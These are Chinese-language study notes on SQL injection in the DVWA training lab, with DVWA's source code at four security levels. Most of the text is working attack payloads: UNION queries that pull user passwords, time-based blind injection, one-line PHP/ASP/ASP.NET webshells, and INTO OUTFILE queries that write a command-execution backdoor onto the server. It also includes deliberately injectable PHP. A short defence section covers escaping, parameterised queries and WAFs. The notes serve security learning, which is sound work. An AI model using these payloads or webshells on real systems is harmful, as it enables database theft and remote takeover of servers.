输入 1:
sql为:select * from users where id = 1;
输入'测试:
回显:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
报错猜想,输入的'传到了sql里,又由于语法错误,所以报错。通过报错我们可以判断后台对'进行了处理,
因此,这个地方存在sql注入点。
1 or 1=1
sql:select *from users where id = 1 or 1=1;
因为or 1=1 永远为真,所以不仅将id=1的结果报出来,还会将表里所有的信息报出来。
如果不行,说明是字符型
输入1' or '1'='1 或1' or 1=1 -- (--后有空格)
手工利用
使用union,联合查询时列数需要和主查询列数一致
确认主查询列数?
order by
order by 对查询结果排序,按照第x列进行排序,若第n列不存在,则说明小于n列,通过此方法判断有几列
1’ order by 1#
1’ order by 2#
1’ order by 3#
1' union select 1,2--
1' and 1=2 (让前边的查询结果为空)union select database(),user()#
查表名
1' and exists(select * from aa)#得到报错信息,猜测
1.手动尝试,比如admin,user,users
2.brup suite抓包,暴力破解,挂字典
查字段名,同理
1' and exists(select yy from users)#
猜完就可用
1' and 1=2 union select first_name,password from users#
一名话木马:
php:<?php @eval($_POST['chopper']);?>
asp:<%eval request("chopper")%>
asp.net:<%@Page Language="Jscript"%><%Request.Item["chopper"],"unsafe;"%>
菜刀可以对一句话木马进行连接和管理,一句话木马的控制台。
上传一个后门,通过控制后门来得到shell
<?system($_REQUEST['CMD'];)?> //通过request提交,执行shell
1' and 1=2 union select 1,"<?system($_REQUEST['CMD']);?>" into outfile "d:\web\dvwa\zzz.php"
或1' and 1=2 union select "<?","system($_REQUEST['CMD']);?>"into outfile "D:\xxxx\dvwa\zzz.php"
生成一个文件,再去访问:http://192.168.0.3/web/dvwa/zzz.php?cmd=ipconfig 就能执行
1' and 1=2 union select 1,"<?php eval($_POST['888']);?>"into outfile "D:\xxxx\dvwa\yyy.php"
通过菜刀进行连接,就可控制后台服务器
盲注:
使用sleep来进行基于时间的判断
1' and sleep(3)#
firebug
$num = @mysql_numrows( $result ); // The '@' character suppresses errors不会显示错误信息,对错误信息进行屏蔽
防范措施:
代码层面:
1.对输入进行严格的转义和过滤
2.使用参数化,将sql执行完再传参数,sql语句与参数分离
网络层面:
1.通过waf设备启用防sql inject注入策略
2.云端防护(260网站卫士、阿里云盾等)
源代码:
低级:
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysql_numrows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
mysql_close();
}
?>
中级:
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysql_real_escape_string( $id );// 对 ‘ “ 、 ,进行转义
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; //数字型的,前端是个选项,通过burp抓包可以绕过
$result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysql_numrows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?>
高级:
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; //可通过#注释符绕过
$result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysql_numrows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
mysql_close();
}
?>
最高:
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );//有token,防止表、列名的拆解
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT ); //先对语法进行预处理,再传参数,参数不会拼到sql,都只当作值来处理。
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>